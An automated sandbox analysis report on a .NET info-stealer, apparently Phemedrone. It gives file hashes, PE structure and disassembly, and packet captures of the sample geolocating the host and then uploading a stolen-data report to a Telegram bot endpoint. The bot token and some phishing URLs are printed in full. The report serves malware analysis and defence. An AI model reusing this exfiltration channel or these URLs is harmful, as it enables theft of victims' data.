                                                                          https://token.onelogin.com-token-auth.com/Xa0Y1MmVibVhmY0E5dnlabzhVK2w2MVo4bXZUM3RzTFBZU1FSUEYxRHlzb29tODRTUDQ4alBDR3Y1cWUvN1JvVzhtWGVkaHFaSG0rOVpUTVV1VjY2a3MvZDB6TktwTHhsRk9xdzQwQjV6YjIvcnA5MjFsaFJEamtNdXI5UXQ1Qm9lK0ZsZFd0TXI0R2JWWlVYeFFXa2pBaXZOKzR2QXRkUTd3dlBLNzUrQ1RweERVMmQ5ZHQwdjlKZ2dlS2tEVUF5UEE9PS0tdFFWWndQdklZQXNodTY1US0tUXAyU1llVHhDaXRTRjU1OVNWMXFNdz09?cid=2262276963Get hashmaliciousKnowBe4Browse
                                                                          • 149.154.167.220
                                                                          • 104.26.0.100
                                                                          Review_&_Aprove_Your_Next_Payroll84633.htmlGet hashmaliciousUnknownBrowse
                                                                          • 149.154.167.220
                                                                          • 104.26.0.100

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\file.exe.log

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                          File Type:CSV text
                                                                          Category:dropped
                                                                          Size (bytes):1498
                                                                          Entropy (8bit):5.364175471524945
                                                                          Encrypted:false
                                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhBsXE4Np51qE4GIsCKIE4TKBGKoZAE4KKUN8E4KD:MxHKQwYHKGSI6okHNp51qHGIsCtHTHhX
                                                                          MD5:5E8D4A41CB533283B16ADD9EA9F71776
                                                                          SHA1:94024969FC44AFC689F4FA71FFB5FC138653936C
                                                                          SHA-256:CB35783AEFE84715040AD54206C5D5037FFD1C2CA8061D760D32AFB54B3FC30A
                                                                          SHA-512:C95DA8F274972DF0BC4C9AA594CA871CE88583FB420B316EC9BBC300FD1FEF4BA7849458001BCCCDE055898B64F75240C38CC6D1B4E54136CEABF9D089380DA5
                                                                          Malicious:true
                                                                          Reputation:low
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Con

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Entropy (8bit):5.811683523254202
                                                                          TrID:
                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                          File name:file.exe
                                                                          File size:141'824 bytes
                                                                          MD5:cae3f7ae06655eb93f5dfb028ddd3d6d
                                                                          SHA1:54821b16fab00ec529f0b99e1d49de8d291eb492
                                                                          SHA256:1fc74fb83aebbe5a37b41e7a4e900a83288618ca696d76a717e2d6a51fad343f
                                                                          SHA512:e2226e3ba2c9bd079db74dcc0cb87f8d6449c99dfe3d2ccae0dda40b7c1a1ca3b77341e49c72bbb183aca86fd29960a70836bfb758f42c3bf83605b3f808dad8
                                                                          SSDEEP:1536:6KQx+JZ4AV5zOvv24ajo8OFbebA+fnnlNWu0SBs54K4UAfJw1oKrY14a9ilmdz82:6RxSdvzODaM8Olevnlp65mJw1bpuMuf
                                                                          TLSH:24D318246ADB0525D37F9AB4DFE8E4A4CAA5E1120E0BF67B584256C31F12BC0ED4347B
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....."g.........."...0.. ...........?... ...@....@.. ....................................`................................

                                                                          File Icon

                                                                          Icon Hash:00928e8e8686b000

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x423fde
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x6722A9CE [Wed Oct 30 21:49:02 2024 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          jmp dword ptr [00402000h]
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add al, byte ptr [eax]
                                                                          adc byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          and byte ptr [eax], al
                                                                          add byte ptr [eax+00000018h], al
                                                                          push eax
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], 00000000h
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add dword ptr [eax], eax
                                                                          add dword ptr [eax], eax
                                                                          add byte ptr [eax], al
                                                                          cmp byte ptr [eax], al
                                                                          add byte ptr [eax+00000000h], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add dword ptr [eax], eax
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], 00000000h
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [ecx], al
                                                                          add byte ptr [ecx], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax+00h], ch
                                                                          add byte ptr [eax+00000000h], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add dword ptr [eax], eax
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          nop
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax+3C000240h], ah
                                                                          add eax, dword ptr [eax]
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add ah, bl
                                                                          inc ebx
                                                                          add al, byte ptr [eax]
                                                                          jmp far 0000h : 00000001h
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [ebx+eax], bh
                                                                          xor al, 00h
                                                                          add byte ptr [eax], al

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x23f880x53.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x240000x5c6.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x260000xc.reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x20000x21fe40x2200032195bec153f5890c3ec987fb4af7b35False0.4589700137867647data5.8437436511111285IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rsrc0x240000x5c60x6005914c5cf9208fd0654d13215d0e80b7fFalse0.4231770833333333data4.119542434889894IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .reloc0x260000xc0x2007a38deb677a00f9744abd6f5fc5f6536False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_VERSION0x240a00x33cdata0.4251207729468599
                                                                          RT_MANIFEST0x243dc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                          Imports

                                                                          DLLImport
                                                                          mscoree.dll_CorExeMain

                                                                          Network Behavior

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Oct 30, 2024 22:56:55.140666962 CET49704443192.168.2.5104.26.0.100
                                                                          Oct 30, 2024 22:56:55.140713930 CET44349704104.26.0.100192.168.2.5
                                                                          Oct 30, 2024 22:56:55.140799046 CET49704443192.168.2.5104.26.0.100
                                                                          Oct 30, 2024 22:56:55.186470985 CET49704443192.168.2.5104.26.0.100
                                                                          Oct 30, 2024 22:56:55.186489105 CET44349704104.26.0.100192.168.2.5
                                                                          Oct 30, 2024 22:56:55.805557966 CET44349704104.26.0.100192.168.2.5
                                                                          Oct 30, 2024 22:56:55.805687904 CET49704443192.168.2.5104.26.0.100
                                                                          Oct 30, 2024 22:56:55.975681067 CET49704443192.168.2.5104.26.0.100
                                                                          Oct 30, 2024 22:56:55.975699902 CET44349704104.26.0.100192.168.2.5
                                                                          Oct 30, 2024 22:56:55.976021051 CET44349704104.26.0.100192.168.2.5
                                                                          Oct 30, 2024 22:56:56.024738073 CET49704443192.168.2.5104.26.0.100
                                                                          Oct 30, 2024 22:56:56.455800056 CET49704443192.168.2.5104.26.0.100
                                                                          Oct 30, 2024 22:56:56.503329992 CET44349704104.26.0.100192.168.2.5
                                                                          Oct 30, 2024 22:56:56.636811972 CET44349704104.26.0.100192.168.2.5
                                                                          Oct 30, 2024 22:56:56.636925936 CET44349704104.26.0.100192.168.2.5
                                                                          Oct 30, 2024 22:56:56.636972904 CET49704443192.168.2.5104.26.0.100
                                                                          Oct 30, 2024 22:56:56.642528057 CET49704443192.168.2.5104.26.0.100
                                                                          Oct 30, 2024 22:57:01.222210884 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:01.222244024 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:01.222362995 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:01.222933054 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:01.222959042 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:02.085925102 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:02.086008072 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.089993000 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.089999914 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:02.090277910 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:02.091294050 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.135361910 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:02.335410118 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:02.336842060 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.336859941 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:02.336973906 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.336991072 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:02.337133884 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.337151051 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:02.337263107 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.337275028 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:02.337299109 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.337307930 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:02.337316990 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.337321997 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:02.337419987 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.337430000 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:02.337450027 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.337456942 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:02.337469101 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.337471962 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:02.337488890 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.337497950 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:02.337527990 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.337527990 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.337537050 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:02.337543964 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:02.337558985 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.337567091 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:02.337583065 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.337599039 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.337646961 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.337667942 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.337685108 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.349323988 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:02.349467993 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.349478006 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:02.349490881 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.349497080 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:02.349544048 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.349555969 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:02.349564075 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.349574089 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:02.349585056 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.349601984 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.349607944 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:02.349617004 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.349617004 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.349636078 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.349730015 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.349742889 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.349764109 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.355895042 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:02.356033087 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.356045961 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:02.356096029 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.356101990 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.356134892 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:02.356184006 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.356201887 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:02.356220961 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.356239080 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.356316090 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.356338024 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.356403112 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.356518030 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.356559038 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.356601954 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.356618881 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.356690884 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.356725931 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.356744051 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.356785059 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.356795073 CET49705443192.168.2.5149.154.167.220
                                                                          Oct 30, 2024 22:57:02.360786915 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:02.361835003 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:04.002902985 CET44349705149.154.167.220192.168.2.5
                                                                          Oct 30, 2024 22:57:04.014559031 CET49705443192.168.2.5149.154.167.220

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Oct 30, 2024 22:56:55.062736988 CET6010053192.168.2.51.1.1.1
                                                                          Oct 30, 2024 22:56:55.071263075 CET53601001.1.1.1192.168.2.5
                                                                          Oct 30, 2024 22:57:01.212483883 CET6119753192.168.2.51.1.1.1
                                                                          Oct 30, 2024 22:57:01.221640110 CET53611971.1.1.1192.168.2.5

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Oct 30, 2024 22:56:55.062736988 CET192.168.2.51.1.1.10x3ab3Standard query (0)get.geojs.ioA (IP address)IN (0x0001)false
                                                                          Oct 30, 2024 22:57:01.212483883 CET192.168.2.51.1.1.10x6760Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Oct 30, 2024 22:56:55.071263075 CET1.1.1.1192.168.2.50x3ab3No error (0)get.geojs.io104.26.0.100A (IP address)IN (0x0001)false
                                                                          Oct 30, 2024 22:56:55.071263075 CET1.1.1.1192.168.2.50x3ab3No error (0)get.geojs.io104.26.1.100A (IP address)IN (0x0001)false
                                                                          Oct 30, 2024 22:56:55.071263075 CET1.1.1.1192.168.2.50x3ab3No error (0)get.geojs.io172.67.70.233A (IP address)IN (0x0001)false
                                                                          Oct 30, 2024 22:57:01.221640110 CET1.1.1.1192.168.2.50x6760No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                          HTTP Request Dependency Graph

                                                                          • get.geojs.io
                                                                          • api.telegram.org

                                                                          HTTPS Proxied Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.549704104.26.0.1004437140C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-30 21:56:56 UTC76OUTGET /v1/ip/geo.json HTTP/1.1
                                                                          Host: get.geojs.io
                                                                          Connection: Keep-Alive
                                                                          2024-10-30 21:56:56 UTC917INHTTP/1.1 200 OK
                                                                          Date: Wed, 30 Oct 2024 21:56:56 GMT
                                                                          Content-Type: application/json
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          x-request-id: 4e97e5a52dd1ea8c6102e57805ee3032-ASH
                                                                          strict-transport-security: max-age=15552000; includeSubDomains; preload
                                                                          access-control-allow-origin: *
                                                                          access-control-allow-methods: GET
                                                                          pragma: no-cache
                                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          geojs-backend: ash-01
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZJzhxb1iJDGLOSRbqkK%2BhoiRZI%2BNU%2FH1tYhvmqetOGSm%2F9tLOfDvEHPzssRkiqQHXlKNmkBevNHo%2BW3Xif2cMYsKvyG4gYr64aRwBn%2BmgGrV%2FTKP24aAj256bMUBrg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          X-Content-Type-Options: nosniff
                                                                          Server: cloudflare
                                                                          CF-RAY: 8daea87d4d1be534-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-10-30 21:56:56 UTC358INData Raw: 31 35 66 0d 0a 7b 22 69 70 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 5f 6e 61 6d 65 22 3a 22 41 53 4e 2d 51 55 41 44 52 41 4e 45 54 2d 47 4c 4f 42 41 4c 22 2c 22 61 73 6e 22 3a 38 31 30 30 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 41 53 38 31 30 30 20 41 53 4e 2d 51 55 41 44 52 41 4e 45 54 2d 47 4c 4f 42 41 4c 22 2c 22 61 72 65 61 5f 63 6f 64 65 22 3a 22 30 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 43 68 69 63 61 67 6f 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 33 22 3a 22 55 53 41 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 61 63 63 75 72 61 63 79 22 3a 32 30 2c 22 72 65 67
                                                                          Data Ascii: 15f{"ip":"173.254.250.78","organization_name":"ASN-QUADRANET-GLOBAL","asn":8100,"organization":"AS8100 ASN-QUADRANET-GLOBAL","area_code":"0","timezone":"America\/Chicago","country_code":"US","country_code3":"USA","continent_code":"NA","accuracy":20,"reg
                                                                          2024-10-30 21:56:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.549705149.154.167.2204437140C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-30 21:57:02 UTC384OUTPOST /bot6217988193:AAFiJwdcFHDuCM08fAA_dnBQZGLDPSVjUQY/sendDocument HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600
                                                                          Content-Type: multipart/form-data; boundary=----------------------------8dcf90c40a3b06a
                                                                          Host: api.telegram.org
                                                                          Content-Length: 722595
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
                                                                          2024-10-30 21:57:02 UTC25INHTTP/1.1 100 Continue
                                                                          2024-10-30 21:57:02 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 39 30 63 34 30 61 33 62 30 36 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5b 55 53 5d 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 2d 50 68 65 6d 65 64 72 6f 6e 65 2d 52 65 70 6f 72 74 2e 70 68 65 6d 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 44 a7 1d 7c 1f ee e2 1c 34 a6 81 45 94 c8 2d fd 5b 70 13 2d 9a 75 0e 62 d0 5e fd 64 da 73 d0 b5 28 ab dc 7f 40 f0 7e a6 2d 22 f9 b0 de 4a ad f1 49 8f 40 1f 39 cb cb 3e b4 ff 12 79 83 48 20
                                                                          Data Ascii: ------------------------------8dcf90c40a3b06aContent-Disposition: form-data; name="document"; filename="[US]173.254.250.78-Phemedrone-Report.phem"Content-Type: application/octet-streamD|4E-[p-ub^ds(@~-"JI@9>yH
                                                                          2024-10-30 21:57:02 UTC16355OUTData Raw: fd ac f6 0e 83 2a f4 9f 44 ef 11 93 06 57 17 77 ea 3a ea 34 f9 36 9c 19 1f 2b 6d 7b d4 e9 37 a4 40 5a a5 19 8e 2e ef 44 e3 30 c7 fe a9 b1 bf a8 26 10 6d 32 38 de 0b 8e 67 10 df 50 42 d1 57 5f 61 1d 2d b0 16 b0 2f 0b 9f 98 23 71 ab a5 73 87 c4 a9 62 ae 01 3f b2 ed 12 66 2f 6d 69 24 f4 3a 86 24 01 c7 7e aa 8b 37 2c ea bf 11 4e c3 bd 62 b2 73 ff 9a dc 06 4c 9a 2b 62 65 14 dc b5 02 64 50 60 23 0d 20 96 6f 97 bd 1c 6a ff 4b 15 5f 97 4f 7c 85 ed b4 4c 97 4b 42 2c dc 77 10 60 5d 31 06 8e d4 10 5a 69 76 ba f8 3c f0 28 a8 9d 02 af 8d 84 f0 10 07 6e da 27 1c 3f 91 ac 27 96 85 2e 32 57 8b 04 28 9a 9d 63 6b 3a 5f f7 31 aa d7 85 ca 59 be f7 4e 6a 1c 8b 03 e3 50 6b c2 46 b1 56 a7 20 40 96 ae d2 c9 5b c7 66 7c ee 9d d0 45 fe 1b d9 cb 1f 40 b0 03 cc 8f bd 26 2d 88 d2 15
                                                                          Data Ascii: *DWw:46+m{7@Z.D0&m28gPBW_a-/#qsb?f/mi$:$~7,NbsL+bedP`# ojK_O|LKB,w`]1Ziv<(n'?'.2W(ck:_1YNjPkFV @[f|E@&-
